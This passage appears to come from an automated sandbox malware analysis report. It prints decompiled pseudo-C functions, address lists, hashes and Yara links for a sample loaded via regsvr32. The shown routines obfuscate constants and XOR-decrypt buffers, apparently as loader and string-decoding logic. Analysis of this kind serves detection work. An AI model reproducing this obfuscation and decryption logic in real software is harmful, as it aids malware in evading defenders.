Instruction Fuzzy Hash: 374148715093428BD754DF14D94541BBBE0FBD4B54F10092EF58196261D3B8EA4ECB93

Uniqueness

Uniqueness Score: -1.00%

Function 04F6A7C4 Relevance: 1.4, Strings: 1, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F6A7C4(void* __eax, void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t107;
				void* _t114;
				signed int _t116;
				intOrPtr _t131;
				intOrPtr* _t132;
				intOrPtr _t133;
				signed int* _t135;

				_t135 =  &_v28;
				_t131 =  *0x4f82218; // 0x33fd1f0
				_v16 = 0xf2061;
				_t114 = __ecx;
				_v12 = 0xae70d;
				_t132 = _t131 + 0x224;
				_v8 = 0;
				_v4 = 0;
				while(1) {
					_t133 =  *_t132;
					if(_t133 == 0) {
						break;
					}
					__eflags =  *(_t133 + 0x18);
					if( *(_t133 + 0x18) == 0) {
						L4:
						 *_t132 =  *((intOrPtr*)(_t133 + 0x24));
						_v20 = 0x6c9b8d;
						_t116 = 0x60;
						_v20 = _v20 / _t116;
						_v20 = _v20 ^ 0x000f5e0e;
						_v28 = 0xdc37bb;
						_v28 = _v28 ^ 0x27896a5c;
						_v28 = _v28 + 0x69a7;
						_v28 = _v28 ^ 0x27538ba7;
						_v24 = 0x630a5d;
						_v24 = _v24 ^ 0xd5f118a5;
						_v24 = _v24 ^ 0x9ac626b0;
						_t97 =  &_v24;
						 *_t97 = _v24 ^ 0x4f501e91;
						__eflags =  *_t97;
						_t107 = E04F7E4B2(_v20, _v28,  *_t97, _v24, _t133);
					} else {
						_v20 = 0xa52d09;
						_v20 = _v20 >> 5;
						_v20 = _v20 ^ 0x00052968;
						_v24 = 0xabd396;
						_v24 = _v24 ^ 0x00f84240;
						_v24 = _v24 ^ 0x0053914b;
						_v28 = 0x93e2d3;
						_v28 = _v28 << 2;
						_v28 = _v28 | 0x6a16f977;
						_v28 = _v28 >> 4;
						_v28 = _v28 ^ 0x06a83f83;
						_t107 = E04F7E2C3(_t114, _v24,  *((intOrPtr*)(_t133 + 0x28)), _v28);
						__eflags = _t107 - _v20;
						if(_t107 != _v20) {
							_t132 = _t133 + 0x24;
						} else {
							 *((intOrPtr*)(_t133 + 0x34))( *(_t133 + 0x18), 0, 0);
							_v40 = 0x2aca17;
							_v40 = _v40 | 0x7d9f3682;
							_v40 = _v40 * 0x79;
							_v40 = _v40 ^ 0x6fb4c100;
							_v36 = 0xe28757;
							_v36 = _v36 >> 5;
							_v36 = _v36 ^ 0x000907d0;
							_v32 = 0xfb5e31;
							_v32 = _v32 * 0x11;
							_v32 = _v32 ^ 0x10bb82da;
							E04F6CD57( *(_t133 + 0x18), _v40, _v36, _v32);
							_v36 = 0x498e48;
							_v36 = _v36 << 9;
							_v36 = _v36 + 0xe4b1;
							_v36 = _v36 ^ 0x93176e6a;
							_v40 = 0xe343c4;
							_v40 = _v40 << 3;
							_v40 = _v40 | 0x55d8b156;
							_v40 = _v40 ^ 0x57d82140;
							_v32 = 0x96b923;
							_v32 = _v32 * 0x3c;
							_t69 =  &_v32;
							 *_t69 = _v32 ^ 0x2357558e;
							__eflags =  *_t69;
							E04F68B6C(_v36,  *((intOrPtr*)(_t133 + 0x28)), _v40, _v32);
							_t135 =  &(_t135[4]);
							goto L4;
						}
					}
				}
				return _t107;
			}

0x04f6a7c4
0x04f6a7cb
0x04f6a7d3
0x04f6a7db
0x04f6a7dd
0x04f6a7e5
0x04f6a7eb
0x04f6a7ef
0x04f6a9bb
0x04f6a9bb
0x04f6a9bf
0x00000000
0x00000000
0x04f6a7f8
0x04f6a7fb
0x04f6a943
0x04f6a948
0x04f6a94a
0x04f6a958
0x04f6a95c
0x04f6a960
0x04f6a968
0x04f6a970
0x04f6a978
0x04f6a980
0x04f6a988
0x04f6a990
0x04f6a998
0x04f6a9a0
0x04f6a9a0
0x04f6a9a0
0x04f6a9b4
0x04f6a801
0x04f6a801
0x04f6a80b
0x04f6a810
0x04f6a818
0x04f6a820
0x04f6a828
0x04f6a830
0x04f6a838
0x04f6a83d
0x04f6a845
0x04f6a84a
0x04f6a85d
0x04f6a864
0x04f6a868
0x04f6a9cd
0x04f6a86e
0x04f6a873
0x04f6a876
0x04f6a87e
0x04f6a88b
0x04f6a88f
0x04f6a897
0x04f6a89f
0x04f6a8a4
0x04f6a8ac
0x04f6a8b9
0x04f6a8bd
0x04f6a8d4
0x04f6a8d9
0x04f6a8e1
0x04f6a8e6
0x04f6a8ee
0x04f6a8f6
0x04f6a8fe
0x04f6a903
0x04f6a90b
0x04f6a913
0x04f6a920
0x04f6a924
0x04f6a924
0x04f6a924
0x04f6a93b
0x04f6a940
0x00000000
0x04f6a940
0x04f6a868
0x04f6a7fb
0x04f6a9cc

Strings

]c, xrefs: 04F6A988

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ]c
API String ID: 0-3044129945
Opcode ID: 16dc967be23d5c39d02c4d33fe500f12b5642c13713bdc48844cf35d3e914438
Instruction ID: 96bf925b1e821842350db1a45ea4e87aedf3369cd9eb0836847a3a2da2f882c6
Opcode Fuzzy Hash: 16dc967be23d5c39d02c4d33fe500f12b5642c13713bdc48844cf35d3e914438
Instruction Fuzzy Hash: D551D0724083428FC318CF21D58980BBFF1FBA4758F110A1DE496A6261D3B5AA8DCBD2

Uniqueness

Uniqueness Score: -1.00%

Function 04F7B0A4 Relevance: 1.4, Strings: 1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E04F7B0A4(void* __ecx, void* __edx) {
				signed int* _t64;
				signed int* _t82;
				signed int* _t83;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				unsigned int _t93;
				unsigned int _t94;
				unsigned int* _t102;
				signed int _t103;
				signed int _t104;
				unsigned int _t106;
				void* _t112;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t118;
				unsigned int _t120;

				_push( *((intOrPtr*)(_t117 + 0x14)));
				_push(__edx);
				_push(__ecx);
				_t64 = E04F732C4( *((intOrPtr*)(_t117 + 0x14)));
				_t85 =  *_t64;
				_t2 =  &(_t64[1]); // 0x4
				_t82 = _t2;
				_t118 = _t117 + 0xc;
				 *(_t118 + 0x18) = 0xd4516;
				_t115 =  *_t82 ^ _t85;
				 *((intOrPtr*)(_t118 + 0x1c)) = 0xe15a2;
				 *(_t118 + 0x24) = 0xe4f3b7;
				_t83 =  &(_t82[1]);
				 *(_t118 + 0x14) = _t85;
				_t86 = 0x4d;
				 *(_t118 + 0x18) = _t115;
				 *(_t118 + 0x24) =  *(_t118 + 0x24) / _t86;
				 *(_t118 + 0x24) =  *(_t118 + 0x24) >> 4;
				_t87 = 0x2c;
				 *(_t118 + 0x24) =  *(_t118 + 0x24) * 0xb;
				 *(_t118 + 0x24) =  *(_t118 + 0x24) ^ 0x00020b50;
				 *(_t118 + 0x10) = 0xd6ebd8;
				 *(_t118 + 0x10) =  *(_t118 + 0x10) / _t87;
				 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x0004e277;
				_t89 =  *(_t118 + 0x24) + _t115;
				_t106 =  *(_t118 + 0x24) + _t115;
				if(( *(_t118 + 0x10) - 0x00000001 & _t89) != 0) {
					_t106 = (_t106 &  !( *(_t118 + 0x10) - 1)) +  *(_t118 + 0x10);
					_t120 = _t106;
				}
				 *(_t118 + 0x10) = 0xe92506;
				 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffff20ea;
				 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x00e86304;
				 *(_t118 + 0x24) = 0x73346a;
				 *(_t118 + 0x24) =  *(_t118 + 0x24) | 0x3b3b753b;
				 *(_t118 + 0x24) =  *(_t118 + 0x24) ^ 0x3b794330;
				_push(_t89);
				_t103 = E04F73EE6(_t89, _t106, _t120);
				 *(_t118 + 0x14) = _t103;
				if(_t103 != 0) {
					 *(_t118 + 0x24) =  *(_t118 + 0x24) & 0x00000000;
					_t102 = _t103;
					_t112 =  >  ? 0 :  &(_t83[_t106 >> 2]) - _t83 + 3 >> 2;
					if(_t112 != 0) {
						_t116 =  *(_t118 + 0x24);
						_t104 =  *(_t118 + 0x14);
						do {
							_t92 =  *_t83;
							_t83 =  &(_t83[1]);
							_t93 = _t92 ^ _t104;
							 *_t102 = _t93;
							_t102 =  &(_t102[1]);
							_t94 = _t93 >> 0x10;
							 *((char*)(_t102 - 3)) = _t93 >> 8;
							 *(_t102 - 2) = _t94;
							_t116 = _t116 + 1;
							 *((char*)(_t102 - 1)) = _t94 >> 8;
						} while (_t116 < _t112);
						_t103 =  *(_t118 + 0x10);
						_t115 =  *(_t118 + 0x18);
					}
					 *((char*)(_t103 + _t115)) = 0;
				}
				return _t103;
			}

0x04f7b0af
0x04f7b0b0
0x04f7b0b1
0x04f7b0b2
0x04f7b0b7
0x04f7b0b9
0x04f7b0b9
0x04f7b0be
0x04f7b0c1
0x04f7b0c9
0x04f7b0cb
0x04f7b0d5
0x04f7b0dd
0x04f7b0e4
0x04f7b0ea
0x04f7b0ef
0x04f7b0f3
0x04f7b0f7
0x04f7b103
0x04f7b104
0x04f7b108
0x04f7b110
0x04f7b11e
0x04f7b122
0x04f7b132
0x04f7b139
0x04f7b13d
0x04f7b148
0x04f7b148
0x04f7b148
0x04f7b14c
0x04f7b156
0x04f7b15e
0x04f7b166
0x04f7b16e
0x04f7b176
0x04f7b186
0x04f7b18c
0x04f7b18e
0x04f7b195
0x04f7b197
0x04f7b1a1
0x04f7b1b2
0x04f7b1b7
0x04f7b1b9
0x04f7b1bd
0x04f7b1c1
0x04f7b1c1
0x04f7b1c3
0x04f7b1c6
0x04f7b1c8
0x04f7b1cf
0x04f7b1d2
0x04f7b1d5
0x04f7b1d8
0x04f7b1de
0x04f7b1df
0x04f7b1e2
0x04f7b1e6
0x04f7b1ea
0x04f7b1ea
0x04f7b1ee
0x04f7b1ee
0x04f7b1fb

Strings

0Cy;, xrefs: 04F7B17E

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0Cy;
API String ID: 0-3963961279
Opcode ID: 0d469b41605dfb0ec12cb2108d9c6c0c9bf7e1d70ee2360a0bea16c11671fd11
Instruction ID: 0f6051ba757623d0eda7570ae5cf4f1c39837d9a85e2839623565798d26c2cf1
Opcode Fuzzy Hash: 0d469b41605dfb0ec12cb2108d9c6c0c9bf7e1d70ee2360a0bea16c11671fd11
Instruction Fuzzy Hash: BC419C726093428BC714CF1AD94551BFBE1EFC8708F054EADE889AB304D774EA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04F6A528 Relevance: 1.4, Strings: 1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E04F6A528(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t59;
				void* _t61;
				intOrPtr* _t75;
				signed int _t76;
				signed int _t77;
				intOrPtr* _t87;
				void* _t88;

				_t81 = __edx;
				_t75 = __ecx;
				_push(_a12);
				_t87 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t59);
				_v16 = 0x3ed5f;
				_v12 = 0x808f8;
				_t61 = 0x3bd8f;
				_v8 = 0x82a1f;
				_t88 = 0;
				_v4 = 0x9ef44;
				do {
					while(_t61 != 0xd72d) {
						if(_t61 == 0x3bd8f) {
							_v28 = 0xae2354;
							_v28 = _v28 + 0xffffda5c;
							_v28 = _v28 ^ 0xdda95e59;
							_v28 = _v28 << 8;
							_v28 = _v28 ^ 0x04adf996;
							_v24 = 0x9d90e2;
							_v24 = _v24 | 0x9a00815d;
							_v24 = _v24 ^ 0x9a9b9062;
							_t81 = 0x7c;
							 *0x4f8220c = E04F73EE6(_t75, _t81, __eflags);
							_t61 = 0xd72d;
							_t75 = _t75;
							continue;
						} else {
							if(_t61 == 0x598fb) {
								_t75 = _t87;
								__eflags = E04F6DB9B(_t75, _t81);
								if(__eflags != 0) {
									_t88 = 1;
									__eflags = 1;
								} else {
									_t61 = 0xae31a;
									continue;
								}
							} else {
								if(_t61 == 0xae31a) {
									E04F7BDB0(__eflags);
									_t61 = 0xb0ff9;
									continue;
								} else {
									_t98 = _t61 - 0xb0ff9;
									if(_t61 != 0xb0ff9) {
										goto L14;
									} else {
										_v24 = 0x496eb;
										_t76 = 0x7a;
										_v24 = _v24 / _t76;
										_v24 = _v24 >> 1;
										_v24 = _v24 + 0xffff577a;
										_v24 = _v24 ^ 0xfff322ed;
										_v28 = 0xc340c6;
										_t77 = 0x55;
										_v28 = _v28 / _t77;
										_v28 = _v28 + 0xffff1ea2;
										_v28 = _v28 >> 5;
										_v28 = _v28 ^ 0x00044901;
										_v20 = 0xe1b669;
										_v20 = _v20 + 0xccd9;
										_v20 = _v20 ^ 0x00e25d8b;
										E04F7E4B2(_v24, _v28, _t98, _v20,  *0x4f8220c);
									}
								}
							}
						}
						L17:
						return _t88;
					}
					_t75 = _a12;
					__eflags = E04F6A9D2(_t75);
					if(__eflags == 0) {
						_t61 = 0xb0ff9;
						goto L14;
					} else {
						_t61 = 0x598fb;
						continue;
					}
					goto L17;
					L14:
					__eflags = _t61 - 0xf6990;
				} while (__eflags != 0);
				goto L17;
			}

0x04f6a528
0x04f6a528
0x04f6a52f
0x04f6a533
0x04f6a535
0x04f6a539
0x04f6a53d
0x04f6a53e
0x04f6a53f
0x04f6a544
0x04f6a54f
0x04f6a557
0x04f6a55c
0x04f6a564
0x04f6a566
0x04f6a578
0x04f6a578
0x04f6a588
0x04f6a65b
0x04f6a663
0x04f6a66b
0x04f6a673
0x04f6a678
0x04f6a680
0x04f6a688
0x04f6a690
0x04f6a6a3
0x04f6a6a9
0x04f6a6ae
0x04f6a6b3
0x00000000
0x04f6a58e
0x04f6a590
0x04f6a642
0x04f6a649
0x04f6a64b
0x04f6a6de
0x04f6a6de
0x04f6a651
0x04f6a651
0x00000000
0x04f6a651
0x04f6a596
0x04f6a59b
0x04f6a636
0x04f6a63b
0x00000000
0x04f6a5a1
0x04f6a5a1
0x04f6a5a3
0x00000000
0x04f6a5a9
0x04f6a5a9
0x04f6a5b9
0x04f6a5be
0x04f6a5c4
0x04f6a5c8
0x04f6a5d0
0x04f6a5d8
0x04f6a5e4
0x04f6a5e7
0x04f6a5eb
0x04f6a5f3
0x04f6a5f8
0x04f6a600
0x04f6a608
0x04f6a610
0x04f6a62a
0x04f6a630
0x04f6a5a3
0x04f6a59b
0x04f6a590
0x04f6a6e0
0x04f6a6e8
0x04f6a6e8
0x04f6a6b9
0x04f6a6c2
0x04f6a6c4
0x04f6a6cd
0x00000000
0x04f6a6c6
0x04f6a6c6
0x00000000
0x04f6a6c6
0x00000000
0x04f6a6cf
0x04f6a6cf
0x04f6a6cf
0x00000000

Strings

D, xrefs: 04F6A566

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: D
API String ID: 0-66619782
Opcode ID: 9ee8d7bbd7bfe6cac2b9968af6b1ef3bdc87e22cb66bb8caf71d10b28c12ff0f
Instruction ID: db1ebf4405b22946a460e9417f99c9b7c41b896f5a6412dbd7315c5fd762abe9
Opcode Fuzzy Hash: 9ee8d7bbd7bfe6cac2b9968af6b1ef3bdc87e22cb66bb8caf71d10b28c12ff0f
Instruction Fuzzy Hash: E2419D72A083428FD714DE24D84842FBAE1EBC5744F10492DF596AA260E779E94A8F93

Uniqueness

Uniqueness Score: -1.00%

Function 04F62EF6 Relevance: 1.4, Strings: 1, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E04F62EF6(void* __ecx, void* __edx) {
				signed int* _t56;
				signed int _t58;
				signed int _t67;
				signed int _t68;
				signed int _t73;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				void* _t82;
				void* _t95;
				signed int* _t96;
				signed int* _t97;
				unsigned int _t98;
				signed int _t101;
				intOrPtr _t106;
				void* _t107;
				void* _t108;

				_push( *((intOrPtr*)(_t107 + 0x38)));
				_push( *((intOrPtr*)(_t107 + 0x38)));
				_push( *((intOrPtr*)(_t107 + 0x20)));
				_push( *((intOrPtr*)(_t107 + 0x38)));
				_push(__edx);
				_push(__ecx);
				_t56 = E04F732C4( *((intOrPtr*)(_t107 + 0x20)));
				_t75 =  *_t56;
				_t5 =  &(_t56[1]); // 0x4
				_t96 = _t5;
				_t106 = 0;
				 *((intOrPtr*)(_t107 + 0x30)) = 0x695ee;
				_t108 = _t107 + 0x18;
				 *((intOrPtr*)(_t108 + 0x1c)) = 0x1ff25;
				_t73 =  *_t96 ^ _t75;
				 *((intOrPtr*)(_t108 + 0x20)) = 0x6330a;
				_t97 =  &(_t96[1]);
				 *((intOrPtr*)(_t108 + 0x24)) = 0;
				 *(_t108 + 0x30) = 0x47d3e5;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) << 0xc;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) ^ 0x7d3e5004;
				_t58 =  *(_t108 + 0x30) - 1;
				 *(_t108 + 0x14) = _t75;
				_t109 = _t73 & _t58;
				if((_t73 & _t58) == 0) {
					_t98 = _t73;
				} else {
					_t98 = ( !( *(_t108 + 0x30) - 1) & _t73) +  *(_t108 + 0x30);
				}
				 *(_t108 + 0x30) = 0x86ac6f;
				_t76 = 0x6a;
				 *(_t108 + 0x34) =  *(_t108 + 0x30) / _t76;
				_t77 = 0x4b;
				 *(_t108 + 0x34) =  *(_t108 + 0x34) / _t77;
				 *(_t108 + 0x34) =  *(_t108 + 0x34) ^ 0x000fa0fb;
				 *(_t108 + 0x14) = 0x585860;
				_t37 = _t108 + 0x14; // 0x585860
				_t78 = 0x5b;
				_push(_t78);
				 *(_t108 + 0x14) =  *_t37 / _t78;
				 *(_t108 + 0x14) =  *(_t108 + 0x14) ^ 0x000fa56c;
				_t67 = E04F73EE6(_t78, _t98, _t109);
				 *(_t108 + 0x34) = _t67;
				if(_t67 != 0) {
					_t95 =  >  ? 0 :  &(_t97[_t98 >> 2]) - _t97 + 3 >> 2;
					if(_t95 == 0) {
						L7:
						_t68 =  *(_t108 + 0x34);
						if(_t68 != 0) {
							 *_t68 = _t73;
						}
						return  *(_t108 + 0x30);
					}
					_t101 =  *(_t108 + 0x14);
					_t82 = _t67 - _t97;
					do {
						_t106 = _t106 + 1;
						 *(_t82 + _t97) =  *_t97 ^ _t101;
						_t97 =  &(_t97[1]);
					} while (_t106 < _t95);
					goto L7;
				}
				return _t67;
			}

0x04f62f01
0x04f62f05
0x04f62f09
0x04f62f0a
0x04f62f0e
0x04f62f0f
0x04f62f10
0x04f62f15
0x04f62f17
0x04f62f17
0x04f62f1c
0x04f62f1e
0x04f62f26
0x04f62f29
0x04f62f31
0x04f62f33
0x04f62f3b
0x04f62f3e
0x04f62f42
0x04f62f4a
0x04f62f4f
0x04f62f5b
0x04f62f5c
0x04f62f60
0x04f62f62
0x04f62f73
0x04f62f64
0x04f62f6d
0x04f62f6d
0x04f62f75
0x04f62f85
0x04f62f8a
0x04f62f94
0x04f62f99
0x04f62f9f
0x04f62fa7
0x04f62faf
0x04f62fb3
0x04f62fb6
0x04f62fb7
0x04f62fbd
0x04f62fcd
0x04f62fd2
0x04f62fd9
0x04f62fef
0x04f62ff4
0x04f6300d
0x04f6300d
0x04f63013
0x04f63015
0x04f63015
0x00000000
0x04f63017
0x04f62ff6
0x04f62ffc
0x04f62ffe
0x04f63002
0x04f63003
0x04f63006
0x04f63009
0x00000000
0x04f62ffe
0x04f63022

Strings

`XX, xrefs: 04F62FAF

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: `XX
API String ID: 0-2688818344
Opcode ID: 1cf1ab08101ae10ed8143471f649f1dfb61949c388072d0cf3ab66353ba87a39
Instruction ID: 112ab4a214f2ff8a9c899a440e5ad09ad2693e0f9221b1ad8678e13995394a81
Opcode Fuzzy Hash: 1cf1ab08101ae10ed8143471f649f1dfb61949c388072d0cf3ab66353ba87a39
Instruction Fuzzy Hash: 29318AB2A09741AFC744DF19D98481BBBE2FBC8B04F85591DF88597250DB71EC09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04F619C8 Relevance: 1.3, Strings: 1, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E04F619C8(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t105;
				signed int _t115;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				signed int _t137;
				signed int _t138;

				_t137 = _a4;
				_push(_t137);
				_push(__ecx);
				E04F732C4(_t105);
				_a4 = 0x690a4;
				_a4 = 0x70b457;
				_t124 = 0x35;
				_a4 = _a4 / _t124;
				_a4 = _a4 + 0xc8c5;
				_a4 = _a4 ^ 0x000b1d5c;
				E04F7F3A3();
				_v12 = 0x171186;
				_v12 = _v12 >> 5;
				_v12 = _v12 + 0xffffc27b;
				_v12 = _v12 ^ 0x00007b03;
				_v8 = 0x677dfe;
				_v8 = _v8 >> 6;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x3b462a50;
				_v8 = _v8 ^ 0x3b464d3d;
				_a4 = 0x61cb47;
				_a4 = _a4 ^ 0x44f2ba5e;
				_a4 = _a4 | 0x5fd724b3;
				_a4 = _a4 ^ 0x5fda1cb0;
				_v20 = 0x439be7;
				_v20 = _v20 ^ 0xf481cfc9;
				_v20 = _v20 ^ 0xf4c0d695;
				_v16 = 0xbc20af;
				_v16 = _v16 * 0x16;
				_v16 = _v16 ^ 0x10227346;
				_t51 =  &_v8; // 0x3b464d3d
				_t115 = E04F6F826(_v12, _t124,  *_t51);
				_v8 = 0xa6c4f0;
				_t138 = _t115;
				_t126 = 0x13;
				_v8 = _v8 / _t126;
				_v8 = _v8 + 0xffff7db1;
				_v8 = _v8 ^ 0x2c052cb3;
				_v8 = _v8 ^ 0x2c0a47c1;
				_v16 = 0xf8b08d;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0x8d13;
				_v16 = _v16 ^ 0x000a779b;
				_a4 = 0x19ec2c;
				_t127 = 0x61;
				_a4 = _a4 * 5;
				_a4 = _a4 + 0x4b;
				_a4 = _a4 / _t127;
				_a4 = _a4 ^ 0x00031625;
				_v12 = 0x667a90;
				_v12 = _v12 ^ 0xcf776531;
				_v12 = _v12 ^ 0x38eafd02;
				_v12 = _v12 ^ 0xf7fa0f3a;
				_v20 = 0xaffab8;
				_v20 = _v20 ^ 0xb93b3380;
				_v20 = _v20 ^ 0xb994c939;
				_push(_v20);
				_push(_v12);
				_push(_a4);
				_push(_t138);
				_push(_v16);
				E04F759FA(_t137, _v8);
				 *((short*)(_t137 + _t138 * 2)) = 0;
				return 0;
			}

0x04f619d0
0x04f619d3
0x04f619d5
0x04f619d6
0x04f619db
0x04f619e4
0x04f619f0
0x04f619f3
0x04f619f6
0x04f619fd
0x04f61a07
0x04f61a0c
0x04f61a16
0x04f61a1a
0x04f61a21
0x04f61a28
0x04f61a2f
0x04f61a33
0x04f61a37
0x04f61a3e
0x04f61a45
0x04f61a4c
0x04f61a53
0x04f61a5a
0x04f61a61
0x04f61a68
0x04f61a6f
0x04f61a76
0x04f61a81
0x04f61a84
0x04f61a94
0x04f61a9b
0x04f61aa0
0x04f61aa7
0x04f61ab0
0x04f61ab5
0x04f61aba
0x04f61ac1
0x04f61ac8
0x04f61acf
0x04f61ad6
0x04f61ada
0x04f61ae1
0x04f61ae8
0x04f61af3
0x04f61af4
0x04f61af7
0x04f61b00
0x04f61b03
0x04f61b0a
0x04f61b11
0x04f61b18
0x04f61b1f
0x04f61b26
0x04f61b2d
0x04f61b34
0x04f61b3b
0x04f61b3e
0x04f61b43
0x04f61b46
0x04f61b47
0x04f61b4d
0x04f61b57
0x04f61b60

Strings

=MF;, xrefs: 04F61A94

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =MF;
API String ID: 0-1282400340
Opcode ID: ecfc91844cd75f29d4ff6195e7f0772f6b67308ca740c53e340a7e3923099c84
Instruction ID: 1295390acc57b8da47407bf98419436626dcf6a45463ed4cd99a5d36b4f6d6fc
Opcode Fuzzy Hash: ecfc91844cd75f29d4ff6195e7f0772f6b67308ca740c53e340a7e3923099c84
Instruction Fuzzy Hash: 8E41F571900208FBCB59CFA5D98A8DEBFB1FF44358F20C189E819AA250D7B59B55DF80

Uniqueness

Uniqueness Score: -1.00%

Function 04F78D6C Relevance: 1.3, Strings: 1, Instructions: 93
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04F78D6C(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v556;
				signed short _t95;
				signed int _t99;
				signed int _t101;
				signed short* _t103;

				_v28 = _v28 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v36 = 0x216c2;
				_v20 = 0x42931b;
				_t101 = 9;
				_v20 = _v20 / _t101;
				_v20 = _v20 ^ 0xcfe364c8;
				_v20 = _v20 + 0xffffe27e;
				_v20 = _v20 ^ 0xcfe71fa4;
				_v12 = 0xdf3bf8;
				_v12 = _v12 >> 4;
				_v12 = _v12 * 0x35;
				_v12 = _v12 ^ 0x02e28f9a;
				_v16 = 0x950321;
				_v16 = _v16 + 0x876;
				_v16 = _v16 + 0xacb3;
				_v16 = _v16 ^ 0x009e874c;
				_v8 = 0x58b596;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x5ac1fd6e;
				if(E04F6CCAA(_v20,  &_v556, _v12, _v16, _t101, _v8) != 0) {
					_t95 = _v556;
					_t103 =  &_v556;
					if(_t95 != 0) {
						_t99 = _t95 & 0x0000ffff;
						while(_t99 != 0x5c) {
							_t103 =  &(_t103[1]);
							_t99 =  *_t103 & 0x0000ffff;
							if(_t99 != 0) {
								continue;
							} else {
							}
							goto L7;
						}
						_v8 = 0x6c62f4;
						_v8 = _v8 >> 1;
						_v8 = _v8 ^ 0x0036317b;
						_t103[_v8] = 0;
					}
					L7:
					_v24 = 0xfb3342;
					_v24 = _v24 >> 0x10;
					_v24 = _v24 ^ 0x000021fd;
					_v16 = 0xdef82;
					_push(_t103);
					_v16 = _v16 * 0xf;
					_v16 = _v16 >> 0x10;
					_v16 = _v16 ^ 0x000f632b;
					_v20 = 0xecb92c;
					_v20 = _v20 + 0xada6;
					_v20 = _v20 ^ 0x00eb1c75;
					_v8 = 0x5beb31;
					_v8 = _v8 | 0xeef25f78;
					_v8 = _v8 ^ 0xeefcdedb;
					_v12 = 0xc34fb3;
					_v12 = _v12 + 0x967b;
					_v12 = _v12 << 0xd;
					_v12 = _v12 ^ 0x7cc4b87c;
					E04F7B3A1(_t103,  &_v28, _v24, _t103, _v16, _t103, _v20, _v8, _t103, _t103, _v12,  &_v556);
				}
				return _v28;
			}

0x04f78d75
0x04f78d7b
0x04f78d7f
0x04f78d86
0x04f78d92
0x04f78d9b
0x04f78d9e
0x04f78da5
0x04f78dac
0x04f78db3
0x04f78dba
0x04f78dc2
0x04f78dc5
0x04f78dcc
0x04f78dd3
0x04f78dda
0x04f78de1
0x04f78de8
0x04f78def
0x04f78df3
0x04f78e11
0x04f78e17
0x04f78e1e
0x04f78e27
0x04f78e29
0x04f78e2c
0x04f78e32
